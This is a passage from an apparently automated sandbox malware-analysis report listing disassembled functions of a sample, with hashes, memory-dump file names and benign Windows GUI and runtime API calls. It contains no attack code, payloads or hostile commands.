                                                                      • Opcode ID: ab7047eb5f57174d7009e3e072584b4140a450631d10ae5db413bf2fe4f0cd82
                                                                      • Instruction ID: e6a6c2d269f114c5e4149e59a22f6ae7fb71ec0a348d1d735cc705167ecffc55
                                                                      • Opcode Fuzzy Hash: ab7047eb5f57174d7009e3e072584b4140a450631d10ae5db413bf2fe4f0cd82
                                                                      • Instruction Fuzzy Hash: 9EA02230203200EFCB00CF30AF0CB0C3BEABB282C0308C02AA008C0030EB3880A0EB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D62CA Relevance: .8, Instructions: 829COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                      • Instruction ID: 17b3dadb0a60b8f6f4ec2ab880597aad507f381aae42a581f98049a4e94f2b59
                                                                      • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                      • Instruction Fuzzy Hash: BB62B4716047849FCB25CF28C5906B9BBF1AF95304F18896FE8EA8B346D738E945CB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D77EF Relevance: .8, Instructions: 817COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                      • Instruction ID: 590aeca628c9edbbc9ebd86ddbef5ba7d55ec53f698e9521163b164c27730ec1
                                                                      • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                      • Instruction Fuzzy Hash: D162C87160C3458FCB19CF28C8909B9BBF1BF95304F18896EE89A8B346E734E945CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CF461 Relevance: .7, Instructions: 694COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                      • Instruction ID: 07f4e7d69e00efdc628a9cc1df006a160580275972b8de1e26e4d161cb86fd3b
                                                                      • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                      • Instruction Fuzzy Hash: 4B524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D7153 Relevance: .5, Instructions: 536COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fea33961523ab2c42576a92d654b56a6d7d2f90ea22029a89733f9901017cc61
                                                                      • Instruction ID: fb3ef91ef612a9ee6db6330cce212e164311c47716f776cceb915bf1dca80eae
                                                                      • Opcode Fuzzy Hash: fea33961523ab2c42576a92d654b56a6d7d2f90ea22029a89733f9901017cc61
                                                                      • Instruction Fuzzy Hash: 3212BFB16087469BC71CCF28C894AB9B7F1FB94304F14892EE996C7781E338A995CB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CC426 Relevance: .5, Instructions: 454COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb78241a165f6060591c07999d1559cb2154fb8e7ec5f38e5a6e7b91c53f8e90
                                                                      • Instruction ID: 23ed6421ca6dabf37137be664c72e7702d02ac5d1b2b90082497c7ace8f0097f
                                                                      • Opcode Fuzzy Hash: eb78241a165f6060591c07999d1559cb2154fb8e7ec5f38e5a6e7b91c53f8e90
                                                                      • Instruction Fuzzy Hash: 56F1AD716083018FC71ACF28C598A2ABBE5EFD9354F144A2EF4C9D7256E738E945CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CE9B7 Relevance: .3, Instructions: 320COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 218354c8459fc68a1579ebd45e5f39ab255efbe6d73484ded2ed329cf4ad95d1
                                                                      • Instruction ID: 5cf8d1ab10dd3ca81cfba312491602e6781030a9cd10150846abcfe240f54eca
                                                                      • Opcode Fuzzy Hash: 218354c8459fc68a1579ebd45e5f39ab255efbe6d73484ded2ed329cf4ad95d1
                                                                      • Instruction Fuzzy Hash: 0EE135755083948FC344CF29D89086ABFF0BF9A310F49495EF9C497352D235EA29DBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D4088 Relevance: .3, Instructions: 270COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                      • Instruction ID: 6951d812562b0f615bf41ff3a623ae59a73af54d6cafc82c41eb0f7f451162e0
                                                                      • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                      • Instruction Fuzzy Hash: 909147B02003499BDB25EF78DC99BBA77E5FB60304F10092EF59697382EA7CA545C352
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D43BF Relevance: .2, Instructions: 243COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                      • Instruction ID: 44c8fd22a8bdad97997e80e9f5a63400c2b5f829affcf114c3cbed68993743c2
                                                                      • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                      • Instruction Fuzzy Hash: A7812B717043869BDB25DE68D8D5FBD37F4AB91308F00092FE9878B382DA7C99858752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71d26da86daf93217b40ff4e1158331a461e302a0d26580e1986caab02a6afac
                                                                      • Instruction ID: 811c5a0ef7c7bbd8ab2da6b0903aff6b66dd35780e35499f7dea5a637794da40
                                                                      • Opcode Fuzzy Hash: 71d26da86daf93217b40ff4e1158331a461e302a0d26580e1986caab02a6afac
                                                                      • Instruction Fuzzy Hash: 6F6199B5602FCD96CA38996B98957BE239CFB0E34CF14061AE643DF2C2D29DDC428315
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                      • Instruction ID: 66c6857db1b78d50ebc447a337827ca14fd3e090a5a895441f5709b07c0db568
                                                                      • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                      • Instruction Fuzzy Hash: F3512671603ECC97DB38897B855ABBF63C69B0E70CF180919F982CB282C61DED458395
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CEFE2 Relevance: .2, Instructions: 161COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beedfcbc74097371a1ec96ec2005c06541e653d516403e2c84c7eb330b88f624
                                                                      • Instruction ID: b275918e1c26809c3cdb52a79f350a6ae776ec791fb5591847c08dabf3e91c63
                                                                      • Opcode Fuzzy Hash: beedfcbc74097371a1ec96ec2005c06541e653d516403e2c84c7eb330b88f624
                                                                      • Instruction Fuzzy Hash: AE51F8315093D58FC701CF34C14496EBFE1AE9A714F5909ADE4D95B243C238DA8ACB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D00B7 Relevance: .1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a8979ca4eba055230558857beb40a6eee5c4d40a15a6f349793df4de84055605
                                                                      • Instruction ID: 3e4db564f9982034d74f681802afb9b14e17af806b54825cb17b3b694bd5c233
                                                                      • Opcode Fuzzy Hash: a8979ca4eba055230558857beb40a6eee5c4d40a15a6f349793df4de84055605
                                                                      • Instruction Fuzzy Hash: FD51F0B1A083159FC748CF19D88065AF7E1FF88314F058A2EE899E3300D734E959CB9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D3E0B Relevance: .1, Instructions: 112COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                      • Instruction ID: 7d3fbaabd0e3a1a87086cb068e2b6b2bea2cb16418e4a34685f90f07cf265c11
                                                                      • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                      • Instruction Fuzzy Hash: BA3118B1A1474A9FCB14DF28C85566EBBE0FB95304F50452EE485C7341C73CEA0ACB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 007CE30E
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                        • Part of subcall function 007D1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00801030,?,007CD928,00000000,?,00000050,00801030), ref: 007D1DC4
                                                                      • _strlen.LIBCMT ref: 007CE32F
                                                                      • SetDlgItemTextW.USER32(?,007FE274,?), ref: 007CE38F
                                                                      • GetWindowRect.USER32(?,?), ref: 007CE3C9
                                                                      • GetClientRect.USER32(?,?), ref: 007CE3D5
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007CE475
                                                                      • GetWindowRect.USER32(?,?), ref: 007CE4A2
                                                                      • SetWindowTextW.USER32(?,?), ref: 007CE4DB
                                                                      • GetSystemMetrics.USER32(00000008), ref: 007CE4E3
                                                                      • GetWindow.USER32(?,00000005), ref: 007CE4EE
                                                                      • GetWindowRect.USER32(00000000,?), ref: 007CE51B
                                                                      • GetWindow.USER32(00000000,00000002), ref: 007CE58D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                      • String ID: $%s:$CAPTION$d
                                                                      • API String ID: 2407758923-2512411981
                                                                      • Opcode ID: be82f3e2df29faf0e18d89e4e3aff9b1aedaecfee71785acedbe30466dda8f8b
                                                                      • Instruction ID: 3921e0869f20074bc4a26367c5b174cef0fd37c7387bcd1ae21dd9ea6ae12404
                                                                      • Opcode Fuzzy Hash: be82f3e2df29faf0e18d89e4e3aff9b1aedaecfee71785acedbe30466dda8f8b
                                                                      • Instruction Fuzzy Hash: 30819172208341AFD720DF68CD89F6BBBE9FB88704F04492DFA8497250D638E9058B52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007ECB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 007ECB66
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC71E
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC730
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC742
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC754
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC766
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC778
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC78A
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC79C
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7AE
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7C0
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7D2
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7E4
                                                                        • Part of subcall function 007EC701: _free.LIBCMT ref: 007EC7F6
                                                                      • _free.LIBCMT ref: 007ECB5B
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007ECB7D
                                                                      • _free.LIBCMT ref: 007ECB92
                                                                      • _free.LIBCMT ref: 007ECB9D
                                                                      • _free.LIBCMT ref: 007ECBBF
                                                                      • _free.LIBCMT ref: 007ECBD2
                                                                      • _free.LIBCMT ref: 007ECBE0
                                                                      • _free.LIBCMT ref: 007ECBEB
                                                                      • _free.LIBCMT ref: 007ECC23
                                                                      • _free.LIBCMT ref: 007ECC2A
                                                                      • _free.LIBCMT ref: 007ECC47
                                                                      • _free.LIBCMT ref: 007ECC5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: e5d607f4debb472bb31e7796eed1198cab40e84a9948eef763d8eb89abe90cee
                                                                      • Instruction ID: 2c6a0fa51d39f45e94892a980405f55ae91aff69bb615fd05517623a9e7d3710
                                                                      • Opcode Fuzzy Hash: e5d607f4debb472bb31e7796eed1198cab40e84a9948eef763d8eb89abe90cee
                                                                      • Instruction Fuzzy Hash: 2D316075602285DFEB22AA3ADC4AB5677E9AF18310F244419E54CDB1A1DF38AC41CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindow.USER32(?,00000005), ref: 007DD6C1
